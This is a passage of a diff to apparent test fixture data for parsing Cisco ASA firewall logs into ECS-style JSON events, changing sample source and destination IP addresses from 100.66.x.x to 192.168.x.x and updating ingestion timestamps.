outside:192.168.98.44/8278", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -6563,8 +6563,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6599,7 +6599,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6608,8 +6608,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094899098Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", + "ingested": "2021-12-09T13:32:20.604220100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6625,7 +6625,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.115.46", + "mapped_source_ip": "192.168.115.46", "connection_id": "11798", "source_interface": "outside", "mapped_destination_port": 1386 @@ -6647,8 +6647,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6682,7 +6682,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6691,8 +6691,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094900856Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604225400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6728,8 +6728,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6763,7 +6763,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6772,8 +6772,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094902629Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604230800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6809,8 +6809,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6844,7 +6844,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6853,8 +6853,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094904347Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604236200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6890,8 +6890,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6925,7 +6925,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6934,8 +6934,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094906076Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604241500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6971,8 +6971,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7006,7 +7006,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7015,8 +7015,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094907817Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604246900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7052,8 +7052,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7087,7 +7087,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7096,8 +7096,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094909522Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604252200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7133,8 +7133,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7168,7 +7168,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7177,8 +7177,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094911262Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604257700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7214,8 +7214,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7249,7 +7249,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7258,8 +7258,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094913010Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604261500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7295,8 +7295,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7330,7 +7330,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7339,8 +7339,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094914740Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604265800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7376,8 +7376,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7411,7 +7411,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7420,8 +7420,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094916454Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604270500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7457,8 +7457,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7492,7 +7492,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7501,8 +7501,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094918212Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604276700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7538,8 +7538,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7573,7 +7573,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7582,8 +7582,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094919940Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604280200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7619,8 +7619,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7654,7 +7654,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7663,8 +7663,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.094921698Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.604284500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7695,8 +7695,8 @@ }, "destination": { "port": 8279, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1275, @@ -7736,7 +7736,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7744,8 +7744,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094923445Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279", + "ingested": "2021-12-09T13:32:20.604289900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7778,8 +7778,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -7814,7 +7814,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -7823,8 +7823,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094925168Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", + "ingested": "2021-12-09T13:32:20.604294900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -7840,7 +7840,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11799", "source_interface": "outside", "mapped_destination_port": 1275 @@ -7857,8 +7857,8 @@ }, "destination": { "port": 1190, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -7898,7 +7898,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7906,8 +7906,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094926948Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190", + "ingested": "2021-12-09T13:32:20.604298500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7940,8 +7940,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -7976,7 +7976,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -7985,8 +7985,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094928671Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604302700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8002,7 +8002,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.14.30", + "mapped_source_ip": "192.168.14.30", "connection_id": "11800", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8024,8 +8024,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -8060,7 +8060,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -8070,8 +8070,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094930411Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", + "ingested": "2021-12-09T13:32:20.604306300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8108,8 +8108,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8144,7 +8144,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8153,8 +8153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094932151Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604310800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8170,7 +8170,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.210", + "mapped_source_ip": "192.168.252.210", "connection_id": "11801", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8192,8 +8192,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8228,7 +8228,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8238,8 +8238,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094933951Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", + "ingested": "2021-12-09T13:32:20.604315900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8271,8 +8271,8 @@ }, "destination": { "port": 8280, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1276, @@ -8312,7 +8312,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8320,8 +8320,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094935660Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280", + "ingested": "2021-12-09T13:32:20.604320300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8354,8 +8354,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8390,7 +8390,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8399,8 +8399,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094937440Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", + "ingested": "2021-12-09T13:32:20.604325700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8416,7 +8416,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11802", "source_interface": "outside", "mapped_destination_port": 1276 @@ -8433,8 +8433,8 @@ }, "destination": { "port": 8281, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1277, @@ -8474,7 +8474,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8482,8 +8482,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094939156Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281", + "ingested": "2021-12-09T13:32:20.604331100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8516,8 +8516,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8552,7 +8552,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8561,8 +8561,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094940881Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", + "ingested": "2021-12-09T13:32:20.604336500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8578,7 +8578,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11803", "source_interface": "outside", "mapped_destination_port": 1277 @@ -8600,8 +8600,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8636,7 +8636,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8647,8 +8647,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094942623Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", + "ingested": "2021-12-09T13:32:20.604341800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8680,8 +8680,8 @@ }, "destination": { "port": 8282, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1278, @@ -8721,7 +8721,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8729,8 +8729,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094944348Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282", + "ingested": "2021-12-09T13:32:20.604347600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8763,8 +8763,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8799,7 +8799,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8808,8 +8808,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094946147Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", + "ingested": "2021-12-09T13:32:20.604353Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8825,7 +8825,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11804", "source_interface": "outside", "mapped_destination_port": 1278 @@ -8847,8 +8847,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8883,7 +8883,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8894,8 +8894,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094948142Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", + "ingested": "2021-12-09T13:32:20.604358700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8927,8 +8927,8 @@ }, "destination": { "port": 8283, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1279, @@ -8968,7 +8968,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8976,8 +8976,8 @@ }, "event": { "severity": 6, - "ingested": 